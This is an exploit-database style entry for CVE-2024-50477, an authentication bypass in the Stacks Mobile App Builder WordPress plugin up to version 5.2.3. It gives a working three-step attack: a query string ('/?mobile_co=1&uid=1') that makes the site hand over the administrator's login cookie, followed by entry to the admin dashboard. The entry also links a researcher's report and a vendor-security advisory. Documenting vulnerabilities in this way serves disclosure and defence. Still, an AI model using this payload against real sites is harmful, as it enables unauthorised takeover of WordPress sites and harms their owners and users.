# Exploit Title: Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover
# Date: October 25, 2024
# Exploit Author: stealthcopter
# Vendor Homepage: https://stacksmarket.co/
# Software Link: https://wordpress.org/plugins/stacks-mobile-app-builder/
# Version: <= 5.2.3
# Tested on: Ubuntu 24.10/Docker
# CVE: CVE-2024-50477
# References:
# - https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md
# - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover
1. Navigate to the target site and append the following query parameters to the URL to impersonate the user with ID `1`:
`/?mobile_co=1&uid=1`
2. You will now receive an authentication cookie for the specified user ID (typically, user ID `1` is the site administrator).
3. Visit `/wp-admin` — you should have full access to the admin dashboard.
